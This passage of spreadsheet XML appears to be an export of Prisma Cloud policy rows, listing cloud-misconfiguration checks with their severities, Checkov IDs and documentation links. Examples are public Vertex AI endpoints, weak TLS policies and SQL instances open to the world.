      <c r="R1407" t="inlineStr"/>
      <c r="S1407" t="inlineStr"/>
      <c r="T1407" t="b">
        <v>0</v>
      </c>
      <c r="U1407" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1407" t="inlineStr">
        <is>
          <t>IaC:Networking:google-compute-project-metadata</t>
        </is>
      </c>
      <c r="W1407" t="inlineStr">
        <is>
          <t>Ensure oslogin is enabled for a Project</t>
        </is>
      </c>
      <c r="X1407" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-9</t>
        </is>
      </c>
      <c r="Y1407" t="inlineStr"/>
      <c r="Z1407" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["google_compute_project_metadata"]}</t>
        </is>
      </c>
      <c r="AA1407" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1407" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1407" t="inlineStr">
        <is>
          <t>CKV_GCP_33</t>
        </is>
      </c>
      <c r="AD1407" t="b">
        <v>1</v>
      </c>
      <c r="AE1407" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1407" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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7" t="inlineStr">
        <is>
          <t>01eae80a-f04f-4fe2-a5ad-00a414f89c5e</t>
        </is>
      </c>
      <c r="AI1407" t="inlineStr"/>
      <c r="AJ1407" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1407" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1408">
      <c r="A1408" t="inlineStr"/>
      <c r="B1408" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1408" s="2" t="inlineStr"/>
      <c r="D1408" t="inlineStr"/>
      <c r="E1408" t="inlineStr"/>
      <c r="F1408" t="inlineStr"/>
      <c r="G1408" t="b">
        <v>1</v>
      </c>
      <c r="H14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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1408" t="inlineStr">
        <is>
          <t>IaC:Networking:google-compute</t>
        </is>
      </c>
      <c r="K1408" t="inlineStr">
        <is>
          <t>GCP HTTPS Load balancer is set with SSL policy having TLS version 1.1 or lower</t>
        </is>
      </c>
      <c r="L1408" t="inlineStr"/>
      <c r="M1408" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1408" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1408" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1408" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1408" t="inlineStr"/>
      <c r="R1408" t="inlineStr"/>
      <c r="S1408" t="inlineStr"/>
      <c r="T1408" t="b">
        <v>0</v>
      </c>
      <c r="U1408" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1408" t="inlineStr">
        <is>
          <t>IaC:Networking:google-compute-ssl-policy</t>
        </is>
      </c>
      <c r="W1408" t="inlineStr">
        <is>
          <t>Ensure no HTTPS or SSL proxy load balancers permit SSL policies with weak cipher suites</t>
        </is>
      </c>
      <c r="X1408" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-3</t>
        </is>
      </c>
      <c r="Y1408" t="inlineStr"/>
      <c r="Z1408" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["google_compute_ssl_policy"]}</t>
        </is>
      </c>
      <c r="AA1408" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1408" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1408" t="inlineStr">
        <is>
          <t>CKV_GCP_4</t>
        </is>
      </c>
      <c r="AD1408" t="b">
        <v>1</v>
      </c>
      <c r="AE1408" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1408" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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8" t="inlineStr">
        <is>
          <t>513244c1-c014-4f65-9613-247db7c2932a</t>
        </is>
      </c>
      <c r="AI1408" t="inlineStr"/>
      <c r="AJ1408" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1408" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1409">
      <c r="A1409" t="inlineStr"/>
      <c r="B1409" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1409" s="2" t="inlineStr"/>
      <c r="D1409" t="inlineStr"/>
      <c r="E1409" t="inlineStr"/>
      <c r="F1409" t="inlineStr"/>
      <c r="G1409" t="b">
        <v>1</v>
      </c>
      <c r="H14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09" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1409" t="inlineStr">
        <is>
          <t>IaC:Networking:google-compute</t>
        </is>
      </c>
      <c r="K1409" t="inlineStr">
        <is>
          <t>GCP VPC Network subnets have Private Google access for IPv6 disabled</t>
        </is>
      </c>
      <c r="L1409" t="inlineStr"/>
      <c r="M1409" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1409" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1409" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1409" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1409" t="inlineStr"/>
      <c r="R1409" t="inlineStr"/>
      <c r="S1409" t="inlineStr"/>
      <c r="T1409" t="b">
        <v>0</v>
      </c>
      <c r="U1409" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1409" t="inlineStr">
        <is>
          <t>IaC:Networking:google-compute-subnetwork</t>
        </is>
      </c>
      <c r="W1409" t="inlineStr">
        <is>
          <t>Ensure that Private google access is enabled for IPV6</t>
        </is>
      </c>
      <c r="X1409" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/content/techdocs/en_US/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-private-google-access-is-enabled-for-ipv6.html</t>
        </is>
      </c>
      <c r="Y1409" t="inlineStr"/>
      <c r="Z1409" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["google_compute_subnetwork"]}</t>
        </is>
      </c>
      <c r="AA1409" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1409" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1409" t="inlineStr">
        <is>
          <t>CKV_GCP_76</t>
        </is>
      </c>
      <c r="AD1409" t="b">
        <v>1</v>
      </c>
      <c r="AE1409" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1409" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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09" t="inlineStr">
        <is>
          <t>34dc99b5-8f72-4ce4-a1d9-f4434ddbee6e</t>
        </is>
      </c>
      <c r="AI1409" t="inlineStr"/>
      <c r="AJ1409" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1409" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1410">
      <c r="A1410" t="inlineStr"/>
      <c r="B1410" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1410" s="2" t="inlineStr"/>
      <c r="D1410" t="inlineStr"/>
      <c r="E1410" t="inlineStr"/>
      <c r="F1410" t="inlineStr"/>
      <c r="G1410" t="b">
        <v>1</v>
      </c>
      <c r="H14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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1410" t="inlineStr">
        <is>
          <t>IaC:Networking:google-dns</t>
        </is>
      </c>
      <c r="K1410" t="inlineStr">
        <is>
          <t>RSASHA1 is used for Zone-Signing and Key-Signing Keys in Cloud DNS DNSSEC</t>
        </is>
      </c>
      <c r="L1410" t="inlineStr"/>
      <c r="M1410" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1410" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1410" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1410" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1410" t="inlineStr"/>
      <c r="R1410" t="inlineStr"/>
      <c r="S1410" t="inlineStr"/>
      <c r="T1410" t="b">
        <v>0</v>
      </c>
      <c r="U1410" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1410" t="inlineStr">
        <is>
          <t>IaC:Networking:google-dns-managed-zone</t>
        </is>
      </c>
      <c r="W1410" t="inlineStr">
        <is>
          <t>Ensure that RSASHA1 is not used for the zone-signing and key-signing keys in Cloud DNS DNSSEC</t>
        </is>
      </c>
      <c r="X1410" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-6</t>
        </is>
      </c>
      <c r="Y1410" t="inlineStr"/>
      <c r="Z1410" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["google_dns_managed_zone"]}</t>
        </is>
      </c>
      <c r="AA1410" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1410" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1410" t="inlineStr">
        <is>
          <t>CKV_GCP_17</t>
        </is>
      </c>
      <c r="AD1410" t="b">
        <v>1</v>
      </c>
      <c r="AE1410" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1410" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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0" t="inlineStr">
        <is>
          <t>aecd368d-a818-4928-821f-2e7e991260d3</t>
        </is>
      </c>
      <c r="AI1410" t="inlineStr"/>
      <c r="AJ1410" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1410" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1411">
      <c r="A1411" t="inlineStr"/>
      <c r="B1411" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1411" s="2" t="inlineStr"/>
      <c r="D1411" t="inlineStr"/>
      <c r="E1411" t="inlineStr"/>
      <c r="F1411" t="inlineStr"/>
      <c r="G1411" t="b">
        <v>1</v>
      </c>
      <c r="H14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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1411" t="inlineStr">
        <is>
          <t>IaC:Networking:google-notebooks</t>
        </is>
      </c>
      <c r="K1411" t="inlineStr">
        <is>
          <t>Vertex AI runtime is public</t>
        </is>
      </c>
      <c r="L1411" t="inlineStr"/>
      <c r="M1411" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1411" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1411" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1411" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1411" t="inlineStr"/>
      <c r="R1411" t="inlineStr"/>
      <c r="S1411" t="inlineStr"/>
      <c r="T1411" t="b">
        <v>0</v>
      </c>
      <c r="U1411" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1411" t="inlineStr">
        <is>
          <t>IaC:Networking:google-notebooks-runtime</t>
        </is>
      </c>
      <c r="W1411" t="inlineStr">
        <is>
          <t>Ensure Vertex AI runtime is private</t>
        </is>
      </c>
      <c r="X1411" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-google-cloud-2-36</t>
        </is>
      </c>
      <c r="Y1411" t="inlineStr"/>
      <c r="Z1411" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["google_notebooks_runtime"]}</t>
        </is>
      </c>
      <c r="AA1411" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1411" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1411" t="inlineStr">
        <is>
          <t>CKV2_GCP_36</t>
        </is>
      </c>
      <c r="AD1411" t="b">
        <v>1</v>
      </c>
      <c r="AE1411" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1411" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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1" t="inlineStr">
        <is>
          <t>9efe7da5-17bb-42b6-b120-5d567557b261</t>
        </is>
      </c>
      <c r="AI1411" t="inlineStr"/>
      <c r="AJ1411" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1411" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1412">
      <c r="A1412" t="inlineStr"/>
      <c r="B1412" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1412" s="2" t="inlineStr"/>
      <c r="D1412" t="inlineStr"/>
      <c r="E1412" t="inlineStr"/>
      <c r="F1412" t="inlineStr"/>
      <c r="G1412" t="b">
        <v>1</v>
      </c>
      <c r="H14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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1412" t="inlineStr">
        <is>
          <t>IaC:Networking:google-sql</t>
        </is>
      </c>
      <c r="K1412" t="inlineStr">
        <is>
          <t>GCP SQL database is publicly accessible</t>
        </is>
      </c>
      <c r="L1412" t="inlineStr"/>
      <c r="M1412" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1412" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1412" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1412" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1412" t="inlineStr"/>
      <c r="R1412" t="inlineStr"/>
      <c r="S1412" t="inlineStr"/>
      <c r="T1412" t="b">
        <v>0</v>
      </c>
      <c r="U1412" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1412" t="inlineStr">
        <is>
          <t>IaC:Networking:google-sql-database-instance</t>
        </is>
      </c>
      <c r="W1412" t="inlineStr">
        <is>
          <t>Ensure that Cloud SQL database Instances are not open to the world</t>
        </is>
      </c>
      <c r="X1412" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-4</t>
        </is>
      </c>
      <c r="Y1412" t="inlineStr"/>
      <c r="Z1412" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["google_sql_database_instance"]}</t>
        </is>
      </c>
      <c r="AA1412" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1412" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1412" t="inlineStr">
        <is>
          <t>CKV_GCP_11</t>
        </is>
      </c>
      <c r="AD1412" t="b">
        <v>1</v>
      </c>
      <c r="AE1412" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1412" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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2" t="inlineStr">
        <is>
          <t>b024e482-2425-4fa4-80b2-9c386879cea3</t>
        </is>
      </c>
      <c r="AI1412" t="inlineStr"/>
      <c r="AJ1412" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1412" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1413">
      <c r="A1413" t="inlineStr"/>
      <c r="B1413" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1413" s="2" t="inlineStr"/>
      <c r="D1413" t="inlineStr"/>
      <c r="E1413" t="inlineStr"/>
      <c r="F1413" t="inlineStr"/>
      <c r="G1413" t="b">
        <v>1</v>
      </c>
      <c r="H14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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1413" t="inlineStr">
        <is>
          <t>IaC:Networking:google-tpu</t>
        </is>
      </c>
      <c r="K1413" t="inlineStr">
        <is>
          <t>TPU v2 VM is public</t>
        </is>
      </c>
      <c r="L1413" t="inlineStr"/>
      <c r="M1413" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1413" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1413" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1413" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1413" t="inlineStr"/>
      <c r="R1413" t="inlineStr"/>
      <c r="S1413" t="inlineStr"/>
      <c r="T1413" t="b">
        <v>0</v>
      </c>
      <c r="U1413" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1413" t="inlineStr">
        <is>
          <t>IaC:Networking:google-tpu-v2-vm</t>
        </is>
      </c>
      <c r="W1413" t="inlineStr">
        <is>
          <t>Ensure TPU v2 is private</t>
        </is>
      </c>
      <c r="X1413" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-google-cloud-2-32</t>
        </is>
      </c>
      <c r="Y1413" t="inlineStr"/>
      <c r="Z1413" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["google_tpu_v2_vm"]}</t>
        </is>
      </c>
      <c r="AA1413" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1413" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1413" t="inlineStr">
        <is>
          <t>CKV2_GCP_32</t>
        </is>
      </c>
      <c r="AD1413" t="b">
        <v>1</v>
      </c>
      <c r="AE1413" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1413" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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3" t="inlineStr">
        <is>
          <t>bcc85617-47ce-4c79-80f5-1b01ec3941de</t>
        </is>
      </c>
      <c r="AI1413" t="inlineStr"/>
      <c r="AJ1413" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1413" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1414">
      <c r="A1414" t="inlineStr"/>
      <c r="B1414" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1414" s="2" t="inlineStr"/>
      <c r="D1414" t="inlineStr"/>
      <c r="E1414" t="inlineStr"/>
      <c r="F1414" t="inlineStr"/>
      <c r="G1414" t="b">
        <v>1</v>
      </c>
      <c r="H14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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1414" t="inlineStr">
        <is>
          <t>IaC:Networking:google-vertex</t>
        </is>
      </c>
      <c r="K1414" t="inlineStr">
        <is>
          <t>Vertex AI endpoint is public</t>
        </is>
      </c>
      <c r="L1414" t="inlineStr"/>
      <c r="M1414" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1414" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1414" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1414" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1414" t="inlineStr"/>
      <c r="R1414" t="inlineStr"/>
      <c r="S1414" t="inlineStr"/>
      <c r="T1414" t="b">
        <v>0</v>
      </c>
      <c r="U1414" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1414" t="inlineStr">
        <is>
          <t>IaC:Networking:google-vertex-ai-endpoint</t>
        </is>
      </c>
      <c r="W1414" t="inlineStr">
        <is>
          <t>Ensure Vertex AI endpoint is private</t>
        </is>
      </c>
      <c r="X1414" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-google-cloud-2-33</t>
        </is>
      </c>
      <c r="Y1414" t="inlineStr"/>
      <c r="Z1414" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["google_vertex_ai_endpoint"]}</t>
        </is>
      </c>
      <c r="AA1414" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1414" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1414" t="inlineStr">
        <is>
          <t>CKV2_GCP_33</t>
        </is>
      </c>
      <c r="AD1414" t="b">
        <v>1</v>
      </c>
      <c r="AE1414" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1414" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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4" t="inlineStr">
        <is>
          <t>33fee74c-548e-4ff2-b36c-068a28002661</t>
        </is>
      </c>
      <c r="AI1414" t="inlineStr"/>
      <c r="AJ1414" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1414" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1415">
      <c r="A1415" t="inlineStr"/>
      <c r="B1415" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1415" s="2" t="inlineStr"/>
      <c r="D1415" t="inlineStr"/>
      <c r="E1415" t="inlineStr"/>
      <c r="F1415" t="inlineStr"/>
      <c r="G1415" t="b">
        <v>1</v>
      </c>
      <c r="H14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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1415" t="inlineStr">
        <is>
          <t>IaC:Networking:google-vertex</t>
        </is>
      </c>
      <c r="K1415" t="inlineStr">
        <is>
          <t>Vertex AI index endpoint is public</t>
        </is>
      </c>
      <c r="L1415" t="inlineStr"/>
      <c r="M1415" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1415" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1415" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1415" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1415" t="inlineStr"/>
      <c r="R1415" t="inlineStr"/>
      <c r="S1415" t="inlineStr"/>
      <c r="T1415" t="b">
        <v>0</v>
      </c>
      <c r="U1415" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1415" t="inlineStr">
        <is>
          <t>IaC:Networking:google-vertex-ai-index-endpoint</t>
        </is>
      </c>
      <c r="W1415" t="inlineStr">
        <is>
          <t>Ensure Vertex AI index endpoint is private</t>
        </is>
      </c>
      <c r="X1415" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-google-cloud-2-34</t>
        </is>
      </c>
      <c r="Y1415" t="inlineStr"/>
      <c r="Z1415" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["google_vertex_ai_index_endpoint"]}</t>
        </is>
      </c>
      <c r="AA1415" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1415" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1415" t="inlineStr">
        <is>
          <t>CKV2_GCP_34</t>
        </is>
      </c>
      <c r="AD1415" t="b">
        <v>1</v>
      </c>
      <c r="AE1415" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1415" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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5" t="inlineStr">
        <is>
          <t>7c6ea43f-6b73-47f0-a11b-86cf8347c427</t>
        </is>
      </c>
      <c r="AI1415" t="inlineStr"/>
      <c r="AJ1415" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1415" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1416">
      <c r="A1416" t="inlineStr"/>
      <c r="B1416" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1416" s="2" t="inlineStr"/>
      <c r="D1416" t="inlineStr"/>
      <c r="E1416" t="inlineStr"/>
      <c r="F1416" t="inlineStr"/>
      <c r="G1416" t="b">
        <v>1</v>
      </c>
      <c r="H14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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1416" t="inlineStr">
        <is>
          <t>IaC:Networking:ibm-container</t>
        </is>
      </c>
      <c r="K1416" t="inlineStr">
        <is>
          <t>IBM Cloud Kubernetes clusters are accessible by using public endpoint in Terraform</t>
        </is>
      </c>
      <c r="L1416" t="inlineStr"/>
      <c r="M1416" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1416" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1416" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1416" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1416" t="inlineStr"/>
      <c r="R1416" t="inlineStr"/>
      <c r="S1416" t="inlineStr"/>
      <c r="T1416" t="b">
        <v>0</v>
      </c>
      <c r="U1416" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1416" t="inlineStr">
        <is>
          <t>IaC:Networking:ibm-container-cluster</t>
        </is>
      </c>
      <c r="W1416" t="inlineStr">
        <is>
          <t>Ensure Kubernetes clusters are accessible by using private endpoint and NOT public endpoint</t>
        </is>
      </c>
      <c r="X1416" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ibm-policies/ibm-networking-policies/bc-ibm-2-7</t>
        </is>
      </c>
      <c r="Y1416" t="inlineStr"/>
      <c r="Z1416" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["ibm_container_cluster"]}</t>
        </is>
      </c>
      <c r="AA1416" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1416" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1416" t="inlineStr">
        <is>
          <t>CKV2_IBM_7</t>
        </is>
      </c>
      <c r="AD1416" t="b">
        <v>1</v>
      </c>
      <c r="AE1416" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1416" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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6" t="inlineStr">
        <is>
          <t>fe3516c6-5474-4295-93fe-940564acc8fd</t>
        </is>
      </c>
      <c r="AI1416" t="inlineStr"/>
      <c r="AJ1416" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1416" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1417">
      <c r="A1417" t="inlineStr"/>
      <c r="B1417" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1417" s="2" t="inlineStr"/>
      <c r="D1417" t="inlineStr"/>
      <c r="E1417" t="inlineStr"/>
      <c r="F1417" t="inlineStr"/>
      <c r="G1417" t="b">
        <v>1</v>
      </c>
      <c r="H14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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1417" t="inlineStr">
        <is>
          <t>IaC:Networking:openstack-compute</t>
        </is>
      </c>
      <c r="K1417" t="inlineStr">
        <is>
          <t>OpenStack Security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp)</t>
        </is>
      </c>
      <c r="L1417" t="inlineStr"/>
      <c r="M1417" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1417" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1417" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1417" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1417" t="inlineStr"/>
      <c r="R1417" t="inlineStr"/>
      <c r="S1417" t="inlineStr"/>
      <c r="T1417" t="b">
        <v>0</v>
      </c>
      <c r="U1417" t="inlineStr">
        <is>
          <t>exposure</t>
